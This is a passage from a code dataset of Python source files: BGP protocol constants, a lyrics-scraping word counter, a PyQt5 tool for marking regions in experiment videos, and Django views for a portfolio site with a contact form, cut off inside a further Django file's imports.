ST_IDLE: \"IDLE\",\n ST_CONNECT: \"CONNECT\",\n ST_ACTIVE: \"ACTIVE\",\n ST_OPENSENT: \"OPENSENT\",\n ST_OPENCONFIRM: \"OPENCONFIRM\",\n ST_ESTABLISHED: \"ESTABLISHED\"\n}\n\n# Notification error codes\nERR_MSG_HDR = 1\nERR_MSG_OPEN = 2\nERR_MSG_UPDATE = 3\nERR_HOLD_TIMER_EXPIRED = 4\nERR_FSM = 5\nERR_CEASE = 6\n\n# Notification suberror codes\nERR_MSG_HDR_CONN_NOT_SYNC = 1\nERR_MSG_HDR_BAD_MSG_LEN = 2\nERR_MSG_HDR_BAD_MSG_TYPE = 3\n\nERR_MSG_OPEN_UNSUP_VERSION = 1\nERR_MSG_OPEN_BAD_PEER_AS = 2\nERR_MSG_OPEN_BAD_BGP_ID = 3\nERR_MSG_OPEN_UNSUP_OPT_PARAM = 4\nERR_MSG_OPEN_UNACCPT_HOLD_TIME = 6\n\nERR_MSG_UPDATE_MALFORMED_ATTR_LIST = 1\nERR_MSG_UPDATE_UNRECOGNIZED_WELLKNOWN_ATTR = 2\nERR_MSG_UPDATE_MISSING_WELLKNOWN_ATTR = 3\nERR_MSG_UPDATE_ATTR_FLAGS = 4\nERR_MSG_UPDATE_ATTR_LEN = 5\nERR_MSG_UPDATE_INVALID_ORIGIN = 6\nERR_MSG_UPDATE_INVALID_NEXTHOP = 8\nERR_MSG_UPDATE_OPTIONAL_ATTR = 9\nERR_MSG_UPDATE_INVALID_NETWORK_FIELD = 10\nERR_MSG_UPDATE_MALFORMED_ASPATH = 11\n\n# BGP Open optional parameter codes\nOPEN_PARAM_CAPABILITIES = 2\n\n# BGP Capability codes\nCAP_MP_EXT = 1\nCAP_ROUTE_REFRESH = 2\nCAP_ORF = 3\n\nAFI_INET = 1\nAFI_INET6 = 2\nSUPPORTED_AFI = [AFI_INET, AFI_INET6]\n\nSAFI_UNICAST = 1\nSAFI_MULTICAST = 2\nSUPPORTED_SAFI = [SAFI_UNICAST, SAFI_MULTICAST]\n","sub_path":"pybal/bgp/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"372165771","text":"import re\nimport requests\nfrom lxml import html\nfrom bs4 import BeautifulSoup\nfrom unidecode import unidecode\n\ndef print_words(words, max_words=20):\n ''' Print first max_words according to the num of occurences '''\n count_words = {k: v for k, v in sorted(words.items(), key=lambda item: item[1], reverse=True)} \n \n for i, (k, v) in enumerate(count_words.items()):\n if i > max_words: break\n print(f'{k}:\\t\\t{v}')\n\ndef make_request(url):\n ''' Make request with the request module and treat errors '''\n\n headers = {\n 'sec-ch-ua': '\" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"91\", \"Chromium\";v=\"91\"',\n 'sec-ch-ua-mobile': '?0',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36',\n }\n\n try:\n response = requests.get(url, headers=headers)\n except Exception as e:\n print(f'Error - {e.args}')\n return None\n \n if response.status_code != 200:\n return None\n\n return response\n\ndef get_songs_tags_lxml(response):\n ''' Use lxml to parse artist page '''\n tree = html.fromstring(response.text)\n songs_tags = tree.xpath('//a[@class=\"song-name\"]')\n return songs_tags\n\ndef get_songs_tags_bs4(response):\n ''' Use BeautifulSoup to parse artist page '''\n soup = BeautifulSoup(response.text, 'lxml')\n songs_tags = soup.find_all('a', {'class': 'song-name'}, href=True)\n return songs_tags\n\ndef get_lyrics_lxml(response):\n ''' Use lxml to parse song lyrics page '''\n tree = html.fromstring(response.text)\n lyrics = tree.xpath('//div[@class=\"cnt-letra p402_premium\"]//text()')\n return lyrics\n\ndef get_lyrics_bs4(response):\n ''' Use BeautifulSoup to parse song lyrics page '''\n soup = BeautifulSoup(response.text, 'lxml')\n lyrics_div = soup.find('div', {'class': 'cnt-letra p402_premium'})\n lyrics_tags = lyrics_div.find_all('p')\n lyrics = [t.get_text(separator=' ') for t in lyrics_tags]\n return lyrics\n\nif __name__ == '__main__':\n use_lxml = True # set which module to use\n max_songs = 10 # set amount of songs to consider\n artist = 'O grilo' # set artist\n \n main_url = 'https://www.letras.mus.br' \n clean_artist = artist.lower().replace(' ', '-')\n url = main_url + '/' + clean_artist\n\n # get artist page\n response = make_request(url)\n \n if response == None:\n print('Failed')\n exit(1)\n \n # parse artist page\n if use_lxml:\n songs_tags = get_songs_tags_lxml(response)\n else:\n songs_tags = get_songs_tags_bs4(response)\n\n songs_urls = [main_url + song.get('href') for song in songs_tags]\n \n count_words = {}\n num_songs = min(len(songs_urls), max_songs)\n \n # get each song\n for index, url in enumerate(songs_urls[:num_songs], 1):\n song_name = url.split('/')[-2]\n print(f'[{index}/{num_songs}] - {song_name}')\n \n response = make_request(url)\n if response is None:\n print(f'{url} failed')\n continue\n\n # parse lyrics page\n if use_lxml:\n lyrics = get_lyrics_lxml(response)\n else:\n lyrics = get_lyrics_bs4(response)\n \n # loop over verses and words counting them\n for verse in lyrics:\n words = verse.split(' ')\n\n for word in words:\n word = word.lower()\n word = unidecode(word)\n word = re.sub(r'\\W+', '', word)\n\n if word == '':\n continue\n\n if word in count_words:\n count_words[word] += 1\n else:\n count_words[word] = 1\n\n # show result\n print_words(count_words)\n","sub_path":"requests_letras.py","file_name":"requests_letras.py","file_ext":"py","file_size_in_byte":3873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"624043882","text":"from PyQt5.QtWidgets import QWidget, QVBoxLayout, QApplication, QLabel, QPushButton, QStyle, QHBoxLayout, QListWidget, QAction, QMainWindow, QSizePolicy, QFileDialog, QInputDialog, QListWidgetItem, QGraphicsView, QGraphicsScene\nfrom PyQt5.QtCore import QDir, QUrl, QPointF, QSizeF\nfrom PyQt5.QtMultimedia import QMediaContent, QMediaPlayer\nfrom PyQt5.QtMultimediaWidgets import QVideoWidget, QGraphicsVideoItem\nimport sys\nimport ffms2\nimport numpy as np\nimport json\nimport csv\n\n\nclass CMRegionListItem(QListWidgetItem):\n def __init__(self, start, stop, well):\n QListWidgetItem.__init__(self, \"{} - {} ({})\".format(start/1000.0, stop/1000.0, well))\n self.start = start\n self.stop = stop\n self.well = well\n\n def __lt__(self, other):\n return self.start > other.start\n\n\nclass CMWidget(QMainWindow):\n def __init__(self):\n QMainWindow.__init__(self)\n\n self.SPEED_CHANGE_FACTOR = 1.25\n self.JUMP_DIST = 1000 # ms\n self.deletedItem = None\n self.videoFileName = None\n\n self.preTrialLightOffMark = None\n self.trialStartMark = None\n self.trialStopMark = None\n self.probeStartMark = None\n self.probeStopMark = None\n self.postProbeLightOnMark = None\n\n self.initUI()\n self.initMediaPlayer()\n\n # self.loadVideoFromFilename(\"/home/wcroughan/glasses_data/facial_recog/outvid2.mp4\")\n # self.loadVideoFromFilename()\n self.openVideo()\n\n def initUI(self):\n self.setWindowTitle(\"Camera Marker\")\n\n self.scene = QGraphicsScene()\n # self.videoWidget = QVideoWidget()\n self.videoWidget = QGraphicsVideoItem()\n self.videoWidget.setOffset(QPointF(-1200, -800))\n self.videoWidget.setSize(QSizeF(4000, 2000))\n self.scene.addItem(self.videoWidget)\n # self.scene.setSceneRect(0, 0, 1400, 1400)\n\n self.videoParent = QGraphicsView(self.scene)\n\n menuBar = self.menuBar()\n fileMenu = menuBar.addMenu(\"File\")\n ac = QAction('&Export Regions', self)\n ac.setShortcut('Shift+E')\n ac.triggered.connect(self.exportRegions)\n fileMenu.addAction(ac)\n ac = QAction('&Import Regions', self)\n ac.triggered.connect(self.importRegions)\n fileMenu.addAction(ac)\n ac = QAction('&Open Video', self)\n ac.setShortcut('Ctrl+O')\n ac.triggered.connect(self.openVideo)\n fileMenu.addAction(ac)\n ac = QAction('Exit', self)\n ac.triggered.connect(self.exitCall)\n fileMenu.addAction(ac)\n\n mediaMenu = menuBar.addMenu(\"Media\")\n\n self.playButton = QPushButton()\n self.playButton.setEnabled(False)\n self.playButton.setIcon(self.style().standardIcon(QStyle.SP_MediaPlay))\n self.playButton.clicked.connect(self.play)\n ac = QAction('&Play', self)\n ac.setShortcut('5')\n ac.triggered.connect(self.play)\n mediaMenu.addAction(ac)\n\n self.speedUpButton = QPushButton(\"speed up\")\n self.speedUpButton.setEnabled(False)\n self.speedUpButton.clicked.connect(self.speedUp)\n ac = QAction('Speed &Up', self)\n ac.setShortcut('+')\n ac.triggered.connect(self.speedUp)\n mediaMenu.addAction(ac)\n\n self.slowDownButton = QPushButton(\"slow down\")\n self.slowDownButton.setEnabled(False)\n self.slowDownButton.clicked.connect(self.slowDown)\n ac = QAction('Slow &Down', self)\n ac.setShortcut('-')\n ac.triggered.connect(self.slowDown)\n mediaMenu.addAction(ac)\n\n self.jumpFwdButton = QPushButton(\"jump fwd\")\n self.jumpFwdButton.setEnabled(False)\n self.jumpFwdButton.clicked.connect(self.jumpFwd)\n ac = QAction('Jump Fwd', self)\n ac.setShortcut('3')\n ac.triggered.connect(self.jumpFwd)\n mediaMenu.addAction(ac)\n\n self.jumpBackButton = QPushButton(\"jump back\")\n self.jumpBackButton.setEnabled(False)\n self.jumpBackButton.clicked.connect(self.jumpBack)\n ac = QAction('Jump Back', self)\n ac.setShortcut('1')\n ac.triggered.connect(self.jumpBack)\n mediaMenu.addAction(ac)\n\n self.fwdFrameButton = QPushButton(\"fwd frame\")\n self.fwdFrameButton.setEnabled(False)\n self.fwdFrameButton.clicked.connect(self.fwdFrame)\n ac = QAction('fwd Frame', self)\n ac.setShortcut('6')\n ac.triggered.connect(self.fwdFrame)\n mediaMenu.addAction(ac)\n\n self.backFrameButton = QPushButton(\"back frame\")\n self.backFrameButton.setEnabled(False)\n self.backFrameButton.clicked.connect(self.backFrame)\n ac = QAction('back Frame', self)\n ac.setShortcut('4')\n ac.triggered.connect(self.backFrame)\n mediaMenu.addAction(ac)\n\n regionsMenu = menuBar.addMenu(\"Regions\")\n self.setStartMarkButton = QPushButton(\"set start\")\n self.setStartMarkButton.setEnabled(False)\n self.setStartMarkButton.clicked.connect(self.setStartMark)\n ac = QAction('Set Start Mark', self)\n ac.setShortcut('7')\n ac.triggered.connect(self.setStartMark)\n regionsMenu.addAction(ac)\n\n self.setStopMarkButton = QPushButton(\"set stop\")\n self.setStopMarkButton.setEnabled(False)\n self.setStopMarkButton.clicked.connect(self.setStopMark)\n ac = QAction('Set Stop Mark', self)\n ac.setShortcut('9')\n ac.triggered.connect(self.setStopMark)\n regionsMenu.addAction(ac)\n\n self.jumpToStartMarkButton = QPushButton(\"->start\")\n self.jumpToStartMarkButton.setEnabled(False)\n self.jumpToStartMarkButton.clicked.connect(self.jumpToStartMark)\n ac = QAction('Jump to Start Mark', self)\n ac.setShortcut('/')\n ac.triggered.connect(self.jumpToStartMark)\n regionsMenu.addAction(ac)\n\n self.jumpToStopMarkButton = QPushButton(\"->stop\")\n self.jumpToStopMarkButton.setEnabled(False)\n self.jumpToStopMarkButton.clicked.connect(self.jumpToStopMark)\n ac = QAction('Jump to Stop Mark', self)\n ac.setShortcut('*')\n ac.triggered.connect(self.jumpToStopMark)\n regionsMenu.addAction(ac)\n\n controlLayout = QHBoxLayout()\n controlLayout.addWidget(self.playButton)\n controlLayout.addWidget(self.speedUpButton)\n controlLayout.addWidget(self.slowDownButton)\n controlLayout.addWidget(self.jumpFwdButton)\n controlLayout.addWidget(self.jumpBackButton)\n controlLayout.addWidget(self.setStartMarkButton)\n controlLayout.addWidget(self.setStopMarkButton)\n controlLayout.addWidget(self.jumpToStartMarkButton)\n controlLayout.addWidget(self.jumpToStopMarkButton)\n controlLayout.addWidget(self.fwdFrameButton)\n controlLayout.addWidget(self.backFrameButton)\n\n self.saveRegionButton = QPushButton(\"save\")\n # self.saveRegionButton.setEnabled(False)\n self.saveRegionButton.clicked.connect(self.saveRegion)\n ac = QAction('Save Region', self)\n ac.setShortcut('8')\n ac.triggered.connect(self.saveRegion)\n regionsMenu.addAction(ac)\n\n self.loadRegionButton = QPushButton(\"load\")\n # self.loadRegionButton.setEnabled(False)\n self.loadRegionButton.clicked.connect(self.loadRegion)\n ac = QAction('Load Region', self)\n ac.triggered.connect(self.loadRegion)\n regionsMenu.addAction(ac)\n\n self.deleteRegionButton = QPushButton(\"delete\")\n # self.deleteRegionButton.setEnabled(False)\n self.deleteRegionButton.clicked.connect(self.deleteRegion)\n ac = QAction('Delete Region', self)\n ac.triggered.connect(self.deleteRegion)\n regionsMenu.addAction(ac)\n\n self.restoreRegionButton = QPushButton(\"restore\")\n # self.restoreRegionButton.setEnabled(False)\n self.restoreRegionButton.clicked.connect(self.restoreRegion)\n ac = QAction('Restore Region', self)\n ac.triggered.connect(self.restoreRegion)\n regionsMenu.addAction(ac)\n\n self.regionListWidget = QListWidget()\n self.regionListWidget.setSortingEnabled(True)\n\n regionListButtonsLayout = QVBoxLayout()\n regionListButtonsLayout.addWidget(self.saveRegionButton)\n regionListButtonsLayout.addWidget(self.loadRegionButton)\n regionListButtonsLayout.addWidget(self.deleteRegionButton)\n regionListButtonsLayout.addWidget(self.restoreRegionButton)\n\n regionListLayout = QHBoxLayout()\n regionListLayout.addWidget(self.regionListWidget)\n regionListLayout.addLayout(regionListButtonsLayout)\n\n self.setMetaLabelMarkButton = QPushButton(\"Set Meta Label\")\n self.setMetaLabelMarkButton.clicked.connect(self.setMetaLabelMark)\n ac = QAction('Set Meta Label Mark', self)\n ac.setShortcut('2')\n ac.triggered.connect(self.setMetaLabelMark)\n regionsMenu.addAction(ac)\n\n self.preTrialLightOffMarkLabel = QLabel(str(self.preTrialLightOffMark))\n self.trialStartMarkLabel = QLabel(str(self.trialStartMark))\n self.trialStopMarkLabel = QLabel(str(self.trialStopMark))\n self.probeStartMarkLabel = QLabel(str(self.probeStartMark))\n self.probeStopMarkLabel = QLabel(str(self.probeStopMark))\n self.postProbeLightOnMarkLabel = QLabel(str(self.postProbeLightOnMark))\n\n metaLabelsLayout = QHBoxLayout()\n metaLabelsLayout.addWidget(QLabel(\"Pretrial light off:\"))\n metaLabelsLayout.addWidget(self.preTrialLightOffMarkLabel)\n metaLabelsLayout.addWidget(QLabel(\"Trial start\"))\n metaLabelsLayout.addWidget(self.trialStartMarkLabel)\n metaLabelsLayout.addWidget(QLabel(\"Trial stop\"))\n metaLabelsLayout.addWidget(self.trialStopMarkLabel)\n metaLabelsLayout.addWidget(QLabel(\"Probe start\"))\n metaLabelsLayout.addWidget(self.probeStartMarkLabel)\n metaLabelsLayout.addWidget(QLabel(\"Probe stop\"))\n metaLabelsLayout.addWidget(self.probeStopMarkLabel)\n metaLabelsLayout.addWidget(QLabel(\"Postprobe light on:\"))\n metaLabelsLayout.addWidget(self.postProbeLightOnMarkLabel)\n metaLabelsLayout.addWidget(self.setMetaLabelMarkButton)\n\n self.statusLabel = QLabel(\"yo\")\n self.statusLabel.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Maximum)\n\n layout = QVBoxLayout()\n layout.addWidget(self.videoParent)\n layout.addLayout(controlLayout)\n layout.addLayout(regionListLayout)\n layout.addLayout(metaLabelsLayout)\n layout.addWidget(self.statusLabel)\n\n wid = QWidget(self)\n wid.setLayout(layout)\n self.setCentralWidget(wid)\n\n def initMediaPlayer(self):\n self.mediaPlayer = QMediaPlayer(None, QMediaPlayer.VideoSurface)\n self.mediaPlayer.setVideoOutput(self.videoWidget)\n\n self.mediaPlayer.stateChanged.connect(self.mediaStateChanged)\n self.mediaPlayer.positionChanged.connect(self.mediaPositionChanged)\n self.mediaPlayer.durationChanged.connect(self.mediaDurationChanged)\n self.mediaPlayer.error.connect(self.handleMediaError)\n\n def openVideo(self):\n fileName, _ = QFileDialog.getOpenFileName(self, \"Open Video\", QDir.homePath())\n\n if fileName != '':\n self.loadVideoFromFilename(fileName)\n\n def loadVideoFromFilename(self, fileName):\n self.mediaPlayer.setMedia(QMediaContent(QUrl.fromLocalFile(fileName)))\n self.playButton.setEnabled(True)\n self.speedUpButton.setEnabled(True)\n self.slowDownButton.setEnabled(True)\n self.jumpFwdButton.setEnabled(True)\n self.jumpBackButton.setEnabled(True)\n self.setStartMarkButton.setEnabled(True)\n self.setStopMarkButton.setEnabled(True)\n self.fwdFrameButton.setEnabled(True)\n self.backFrameButton.setEnabled(True)\n\n self.startMark = None\n self.stopMark = None\n\n ffmsvid = ffms2.VideoSource(fileName)\n # print(\"Frames:{}\".format(ffmsvid.properties.NumFrames))\n # print(\"Times:{}\".format(ffmsvid.track.timecodes))\n self.frameTimes = np.array(ffmsvid.track.timecodes)\n\n self.videoFileName = fileName\n\n def exitCall(self):\n sys.exit(0)\n\n def play(self):\n if self.mediaPlayer.state() == QMediaPlayer.PlayingState:\n self.mediaPlayer.pause()\n else:\n self.mediaPlayer.play()\n\n def speedUp(self):\n self.mediaPlayer.setPlaybackRate(self.mediaPlayer.playbackRate() * 1.25)\n self.statusLabel.setText(\"New playback rate: {}\".format(self.mediaPlayer.playbackRate()))\n\n def slowDown(self):\n self.mediaPlayer.setPlaybackRate(self.mediaPlayer.playbackRate() / self.SPEED_CHANGE_FACTOR)\n self.statusLabel.setText(\"New playback rate: {}\".format(self.mediaPlayer.playbackRate()))\n\n def jumpFwd(self):\n self.mediaPlayer.setPosition(self.mediaPlayer.position() + self.JUMP_DIST)\n self.statusLabel.setText(\"Jumped by {} ms. New position: {}\".format(\n self.JUMP_DIST, self.mediaPlayer.position()))\n\n def jumpBack(self):\n self.mediaPlayer.setPosition(self.mediaPlayer.position() - self.JUMP_DIST)\n self.statusLabel.setText(\"Jumped by {} ms. New position: {}\".format(\n -self.JUMP_DIST, self.mediaPlayer.position()))\n\n def setStartMark(self):\n self.startMark = self.mediaPlayer.position()\n self.statusLabel.setText(\"Start Mark set to {}\".format(self.startMark))\n\n def setStopMark(self):\n self.stopMark = self.mediaPlayer.position()\n self.statusLabel.setText(\"Stop Mark set to {}\".format(self.stopMark))\n\n def setMetaLabelMark(self):\n option, ok = QInputDialog.getInt(\n self, \"Which mark are you making\", \"1 - pretrial light on\\n2 - trial start\\n3 - trial end\\n4 - probe start\\n5 - probe end\\n6 - post probe light on\")\n if ok:\n if option == 1:\n self.preTrialLightOffMark = self.mediaPlayer.position()\n self.statusLabel.setText(\n \"pre trial light off mark set to {}\".format(self.preTrialLightOffMark))\n self.preTrialLightOffMarkLabel.setText(str(self.preTrialLightOffMark))\n elif option == 2:\n self.trialStartMark = self.mediaPlayer.position()\n self.statusLabel.setText(\n \"trial start mark set to {}\".format(self.trialStartMark))\n self.trialStartMarkLabel.setText(str(self.trialStartMark))\n elif option == 3:\n self.trialStopMark = self.mediaPlayer.position()\n self.statusLabel.setText(\n \"trial Stop mark set to {}\".format(self.trialStopMark))\n self.trialStopMarkLabel.setText(str(self.trialStopMark))\n elif option == 4:\n self.probeStartMark = self.mediaPlayer.position()\n self.statusLabel.setText(\n \"probe start mark set to {}\".format(self.probeStartMark))\n self.probeStartMarkLabel.setText(str(self.probeStartMark))\n elif option == 5:\n self.probeStopMark = self.mediaPlayer.position()\n self.statusLabel.setText(\n \"probe Stop mark set to {}\".format(self.probeStopMark))\n self.probeStopMarkLabel.setText(str(self.probeStopMark))\n elif option == 6:\n self.postProbeLightOnMark = self.mediaPlayer.position()\n self.statusLabel.setText(\n \"probe Stop mark set to {}\".format(self.postProbeLightOnMark))\n self.postProbeLightOnMarkLabel.setText(str(self.postProbeLightOnMark))\n\n def jumpToStartMark(self):\n if self.startMark is not None:\n self.statusLabel.setText(\"Jumping to start mark at {}\".format(self.startMark))\n self.mediaPlayer.setPosition(self.startMark)\n else:\n self.statusLabel.setText(\"no start mark to jump to\")\n\n def jumpToStopMark(self):\n if self.stopMark is not None:\n self.statusLabel.setText(\"Jumping to stop mark at {}\".format(self.stopMark))\n self.mediaPlayer.setPosition(self.stopMark)\n else:\n self.statusLabel.setText(\"no stop mark to jump to\")\n\n def fwdFrame(self):\n currentFrame = np.searchsorted(self.frameTimes, self.mediaPlayer.position())\n if currentFrame < len(self.frameTimes):\n self.mediaPlayer.setPosition(int(self.frameTimes[currentFrame+1]))\n self.statusLabel.setText(\"Going fwd one frame\")\n else:\n self.statusLabel.setText(\"Can't go fwd a frame, already at end\")\n\n def backFrame(self):\n currentFrame = np.searchsorted(self.frameTimes, self.mediaPlayer.position())\n if currentFrame > 0:\n self.mediaPlayer.setPosition(int(self.frameTimes[currentFrame-1]))\n self.statusLabel.setText(\"Going back one frame\")\n else:\n self.statusLabel.setText(\"Can't go back a frame, already at start\")\n\n def saveRegion(self):\n well, ok = QInputDialog.getInt(self, \"Well\", \"well\")\n if ok:\n reg = dict()\n reg['start'] = self.startMark\n reg['stop'] = self.stopMark\n reg['well'] = well\n # self.regionListWidget.addItem(json.dumps(reg))\n self.regionListWidget.addItem(CMRegionListItem(self.startMark, self.stopMark, well))\n\n def loadRegion(self):\n listItem = self.regionListWidget.currentItem()\n self.startMark = listItem.start\n self.stopMark = listItem.stop\n # d = json.loads(listItem.text())\n # self.startMark = d['start']\n # self.stopMark = d['stop']\n self.statusLabel.setText(\"Loaded item {}\".format(listItem))\n\n def deleteRegion(self):\n self.deletedItem = self.regionListWidget.takeItem(self.regionListWidget.currentRow())\n self.statusLabel.setText(\"Deleted {}\".format(self.deletedItem))\n\n def restoreRegion(self):\n if self.deletedItem is None:\n self.statusLabel.setText(\"No item to restore\")\n else:\n self.regionListWidget.addItem(self.deletedItem)\n self.statusLabel.setText(\"Restored item {}\".format(self.deletedItem))\n\n def mediaStateChanged(self, state):\n # print(\"mediaStateChanged {}\".format(state))\n pass\n\n def mediaPositionChanged(self, position):\n # print(\"mediaPositionChanged {}\".format(position))\n pass\n\n def mediaDurationChanged(self, dur):\n # print(\"mediaDurationChanged {}\".format(dur))\n pass\n\n def handleMediaError(self, er):\n print(\"handleMediaError {}\".format(er))\n\n def exportRegions(self):\n fnfilt = \"rgs(*.rgs)\"\n defaultFileName = self.videoFileName + \".rgs\"\n fileName, _ = QFileDialog.getSaveFileName(self, \"Save Regions\", defaultFileName, fnfilt)\n\n if fileName != '':\n if not fileName.endswith(\".rgs\"):\n fileName += \".rgs\"\n self.saveRegionsFromFilename(fileName)\n\n def saveRegionsFromFilename(self, fileName):\n it = [self.regionListWidget.item(r) for r in range(self.regionListWidget.count())]\n with open(fileName, 'w') as csvfile:\n w = csv.writer(csvfile)\n w.writerow([self.preTrialLightOffMark, self.trialStartMark, self.trialStopMark])\n w.writerow([self.probeStartMark, self.probeStopMark, self.postProbeLightOnMark])\n for i in it:\n w.writerow([i.start, i.stop, i.well])\n\n def importRegions(self):\n fnfilt = \"rgs(*.rgs)\"\n if self.videoFileName is not None:\n defaultFileName = self.videoFileName + \".rgs\"\n else:\n defaultFileName = QDir.homePath()\n fileName, _ = QFileDialog.getOpenFileName(self, \"Open Regions\", defaultFileName, fnfilt)\n\n if fileName != '':\n self.loadRegionsFromFilename(fileName)\n\n def loadRegionsFromFilename(self, fileName):\n with open(fileName, 'r') as csvfile:\n reader = csv.reader(csvfile)\n r = list(reader)\n\n self.regionListWidget.clear()\n\n self.preTrialLightOffMark = r[0][0]\n self.trialStartMark = r[0][1]\n self.trialStopMark = r[0][2]\n self.probeStartMark = r[1][0]\n self.probeStopMark = r[1][1]\n self.postProbeLightOnMark = r[1][2]\n self.preTrialLightOffMarkLabel.setText(str(self.preTrialLightOffMark))\n self.trialStartMarkLabel.setText(str(self.trialStartMark))\n self.trialStopMarkLabel.setText(str(self.trialStopMark))\n self.probeStartMarkLabel.setText(str(self.probeStartMark))\n self.probeStopMarkLabel.setText(str(self.probeStopMark))\n self.postProbeLightOnMarkLabel.setText(str(self.postProbeLightOnMark))\n\n for i in r[2:]:\n self.regionListWidget.addItem(CMRegionListItem(int(i[0]), int(i[1]), int(i[2])))\n\n\ndef main():\n parent_app = QApplication(sys.argv)\n cmw = CMWidget()\n cmw.resize(600, 600)\n cmw.show()\n sys.exit(parent_app.exec_())\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"CameraMarker.py","file_name":"CameraMarker.py","file_ext":"py","file_size_in_byte":21122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"282004343","text":"from django.shortcuts import render, HttpResponse, HttpResponseRedirect\nfrom django.template import loader\nimport json\nfrom content import query\nfrom content.models import *\nfrom django.template.context_processors import request\nfrom django.db.models import CharField, Value, SlugField\nfrom django.db.models.functions import Concat\nfrom django.template.defaultfilters import slugify\nfrom django.core.mail import send_mail\nfrom content.forms import Contact\n\n\ndef navcontent():\n return [{'name': e[1], 'slug': e[1].lower(), 'icon': PAGE_CHOICES_ICON_REF[e[0].value]} for e in PAGE_CHOICES]\n\ndef home(request):\n profilehome_field = Profile.objects.all()\n carouselhome_field = Carousel.objects.filter(page_field=PageKey.HOME.value)\n marketinghome_field = Marketing.objects.filter(page_field=PageKey.HOME.value)\n featurettehome_field = Featurette.objects.filter(page_field=PageKey.HOME.value)\n coverhome_field = Cover.objects.filter(page_field=PageKey.HOME.value)\n \n context = {\n 'profile': profilehome_field,\n 'navcontent': navcontent(),\n 'carousel': carouselhome_field,\n 'marketing': marketinghome_field,\n 'featurette': featurettehome_field,\n 'cover': coverhome_field\n }\n return render(request, 'home.html', { 'context': context })\n\ndef work(request):\n profilework_field = Profile.objects.all()\n carouselwork_field = Carousel.objects.filter(page_field=PageKey.WORK.value)\n jumbotronwork_field = Jumbotron.objects.filter(page_field=PageKey.WORK.value)\n featurettework_field = Featurette.objects.filter(page_field=PageKey.WORK.value)\n cardwork_field = Card.objects.filter(page_field=PageKey.WORK.value)\n coverwork_field = Cover.objects.filter(page_field=PageKey.WORK.value)\n \n context = {\n 'profile': profilework_field,\n 'navcontent': navcontent(),\n 'carousel': carouselwork_field,\n 'jumbotron': jumbotronwork_field,\n 'featurette': featurettework_field,\n 'card': cardwork_field,\n 'cover': coverwork_field\n }\n return render(request, 'work.html', { 'context': context })\n\ndef about(request):\n profileabout_field = Profile.objects.all()\n carouselabout_field = Carousel.objects.filter(page_field=PageKey.ABOUT.value)\n jumbotronabout_field = Jumbotron.objects.filter(page_field=PageKey.ABOUT.value)\n featuretteabout_field = Featurette.objects.filter(page_field=PageKey.ABOUT.value)\n coverabout_field = Cover.objects.filter(page_field=PageKey.ABOUT.value)\n \n context = {\n 'profile': profileabout_field,\n 'navcontent': navcontent(),\n 'carousel': carouselabout_field,\n 'jumbotron': jumbotronabout_field,\n 'featurette': featuretteabout_field,\n 'cover': coverabout_field\n }\n return render(request, 'about.html', { 'context': context }) \n\n\ndef contact(request):\n jumbotroncontact_field = Jumbotron.objects.filter(page_field=PageKey.CONTACT.value)\n form_class = Contact\n if request.method == 'POST':\n form = form_class(data=request.POST)\n if form.is_valid():\n subject = form.cleaned_data['subject']\n message = form.cleaned_data['message']\n sender = form.cleaned_data['sender']\n cc_myself = form.cleaned_data['cc_myself']\n \n recipients = ['babakoskoui@gmail.com']\n if cc_myself:\n recipients.append(sender)\n \n send_mail(subject, message, sender, recipients)\n return HttpResponseRedirect('/thanks/')\n else:\n form = form_class \n \n context = { \n 'navcontent': navcontent(),\n 'form': form,\n 'jumbotron': jumbotroncontact_field\n }\n return render(request, 'contact.html', { 'context': context })\n\ndef propertygrowth(request):\n if request.method == 'POST':\n years = dict(request.POST)\n if len(years) > 1:\n years['yearrange'] = list(map(int, years['yearrange'][0].split(' - ')))\n return render(request, 'propertygrowth.html', years) \n else:\n return render(request, 'propertygrowth.html', { 'yearrange': [2010, 2017] }) \n else:\n return render(request, 'propertygrowth.html', { 'yearrange': [2010, 2017] })\n\nif __name__ == '__main__':\n pass\n \n","sub_path":"content/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"479438784","text":"from __future__ import absolute_import, unicode_literals\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.mail import EmailMessage\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponseRedirect\nfrom django.views.generic import DetailView, ListView, RedirectView, UpdateView\n\nfrom django.contrib.auth.mixins import LoginRequiredMixin\n\nfrom .models import User\nfrom django.template import RequestContext\nfrom django.shortcuts import render_to_response, render, redirect\n\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.core.mail import send_mail\nfrom construct_star.users.models import User, Proveedor\nfrom construct_star.users.formularios import FormularioProveedor, ImagenesTrabajosForm, FormularioUpdateCliente, FormularioCliente, FormularioUpdateProveedor, ImagenFormSet, FormularioClienteAplicaProveedor\nfrom django.forms.models import inlineformset_factory, modelformset_factory\nfrom concurrency.utils import ConcurrencyTestMixin\nfrom concurrency.api import disable_concurrency\n\nfrom allauth.account.views import SignupView\nfrom braces.views import LoginRequiredMixin\nfrom django.views.generic import CreateView, FormView, ListView\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.auth.models import Permission\nfrom django.contrib.auth.mixins import UserPassesTestMixin, AccessMixin\nfrom django.shortcuts import redirect\n\nfrom construct_star.tickets.formularios import FormularioSeguimiento,FormularioActualziarTicket\nfrom construct_star.tickets.models import TicketBase, TicketAsignarProveedores,TicketAsignacion, Seguimiento, TicketTipo,TicketAltaTrabajo\n\nfrom construct_star.trabajos.models import TipoTrabajo,get_tarea_base,TareaElectrico,TareaPlomeria,TipoPresupuestoPrevio,TipoSinPresupuestoPrevio\nfrom construct_star.trabajos.views import borrar_tickets_asociados_a_trabajo\nfrom django.utils import timezone\n\n# imports para busqueda\nimport operator\nfrom django.db.models import Q\nfrom 